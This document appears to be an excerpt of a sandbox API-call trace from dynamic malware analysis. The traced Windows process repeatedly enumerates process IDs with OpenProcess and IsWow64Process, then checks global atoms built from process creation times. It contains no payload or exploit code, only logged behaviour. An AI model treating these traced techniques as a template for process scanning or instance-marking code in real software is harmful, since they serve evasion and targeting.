	[0104.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.881] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.881] CloseHandle (hObject=0x694) returned 1
	[0104.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.882] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.882] CloseHandle (hObject=0x694) returned 1
	[0104.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.882] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.882] CloseHandle (hObject=0x694) returned 1
	[0104.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.882] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.882] CloseHandle (hObject=0x694) returned 1
	[0104.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.882] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.882] CloseHandle (hObject=0x694) returned 1
	[0104.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.883] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.883] CloseHandle (hObject=0x694) returned 1
	[0104.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.883] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.883] CloseHandle (hObject=0x694) returned 1
	[0104.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.883] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.883] CloseHandle (hObject=0x694) returned 1
	[0104.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.883] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.883] CloseHandle (hObject=0x694) returned 1
	[0104.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.883] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.883] CloseHandle (hObject=0x694) returned 1
	[0104.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.884] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.884] CloseHandle (hObject=0x694) returned 1
	[0104.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.884] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.884] CloseHandle (hObject=0x694) returned 1
	[0104.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.884] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.884] CloseHandle (hObject=0x694) returned 1
	[0104.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.884] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.884] CloseHandle (hObject=0x694) returned 1
	[0104.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.884] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.884] CloseHandle (hObject=0x694) returned 1
	[0104.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.885] CloseHandle (hObject=0x694) returned 1
	[0104.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.885] CloseHandle (hObject=0x694) returned 1
	[0104.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.885] CloseHandle (hObject=0x694) returned 1
	[0104.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.885] CloseHandle (hObject=0x694) returned 1
	[0104.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.885] CloseHandle (hObject=0x694) returned 1
	[0104.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.886] CloseHandle (hObject=0x694) returned 1
	[0104.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.886] CloseHandle (hObject=0x694) returned 1
	[0104.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.886] CloseHandle (hObject=0x694) returned 1
	[0104.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.886] CloseHandle (hObject=0x694) returned 1
	[0104.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.886] CloseHandle (hObject=0x694) returned 1
	[0104.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.887] CloseHandle (hObject=0x694) returned 1
	[0104.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.887] CloseHandle (hObject=0x694) returned 1
	[0104.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.887] CloseHandle (hObject=0x694) returned 1
	[0104.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.887] CloseHandle (hObject=0x694) returned 1
	[0104.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.887] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.887] CloseHandle (hObject=0x694) returned 1
	[0104.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.888] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.888] CloseHandle (hObject=0x694) returned 1
	[0104.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.888] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.888] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.888] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.889] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.889] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.889] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.889] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.889] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.890] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.890] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.890] CloseHandle (hObject=0x694) returned 1
	[0104.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.890] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.890] CloseHandle (hObject=0x694) returned 1
	[0104.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.890] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.890] CloseHandle (hObject=0x694) returned 1
	[0104.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.891] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.891] CloseHandle (hObject=0x694) returned 1
	[0104.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.927] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.927] CloseHandle (hObject=0x694) returned 1
	[0104.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.927] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.927] CloseHandle (hObject=0x694) returned 1
	[0104.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.928] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.928] CloseHandle (hObject=0x694) returned 1
	[0104.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.928] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.928] CloseHandle (hObject=0x694) returned 1
	[0104.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.928] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.928] CloseHandle (hObject=0x694) returned 1
	[0104.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.929] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.929] CloseHandle (hObject=0x694) returned 1
	[0104.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.929] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.929] CloseHandle (hObject=0x694) returned 1
	[0104.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.929] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.929] CloseHandle (hObject=0x694) returned 1
	[0104.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.929] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.929] CloseHandle (hObject=0x694) returned 1
	[0104.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.930] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.930] CloseHandle (hObject=0x694) returned 1
	[0104.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.930] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.930] CloseHandle (hObject=0x694) returned 1
	[0104.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.930] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.930] CloseHandle (hObject=0x694) returned 1
	[0104.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.930] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.930] CloseHandle (hObject=0x694) returned 1
	[0104.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.931] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.931] CloseHandle (hObject=0x694) returned 1
	[0104.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.931] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.931] CloseHandle (hObject=0x694) returned 1
	[0104.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.931] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.931] CloseHandle (hObject=0x694) returned 1
	[0104.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.931] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.931] CloseHandle (hObject=0x694) returned 1
	[0104.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.931] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.931] CloseHandle (hObject=0x694) returned 1
	[0104.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.932] CloseHandle (hObject=0x694) returned 1
	[0104.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.932] CloseHandle (hObject=0x694) returned 1
	[0104.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.932] CloseHandle (hObject=0x694) returned 1
	[0104.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.932] CloseHandle (hObject=0x694) returned 1
	[0104.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.932] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.932] CloseHandle (hObject=0x694) returned 1
	[0104.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.933] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.933] CloseHandle (hObject=0x694) returned 1
	[0104.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.933] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.933] CloseHandle (hObject=0x694) returned 1
	[0104.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.933] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.933] CloseHandle (hObject=0x694) returned 1
	[0104.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.933] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.933] CloseHandle (hObject=0x694) returned 1
	[0104.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.933] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.933] CloseHandle (hObject=0x694) returned 1
	[0104.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.934] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.934] CloseHandle (hObject=0x694) returned 1
	[0104.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.934] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.934] CloseHandle (hObject=0x694) returned 1
	[0104.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.934] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.934] CloseHandle (hObject=0x694) returned 1
	[0104.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.934] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.934] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.934] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.935] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.935] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.935] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.935] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.935] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.936] CloseHandle (hObject=0x694) returned 1
	[0104.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.936] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.936] CloseHandle (hObject=0x694) returned 1
	[0104.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.936] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.936] CloseHandle (hObject=0x694) returned 1
	[0104.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.936] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.936] CloseHandle (hObject=0x694) returned 1
	[0104.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.972] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.972] CloseHandle (hObject=0x694) returned 1
	[0104.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.972] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.972] CloseHandle (hObject=0x694) returned 1
	[0104.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.973] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.973] CloseHandle (hObject=0x694) returned 1
	[0104.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.973] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
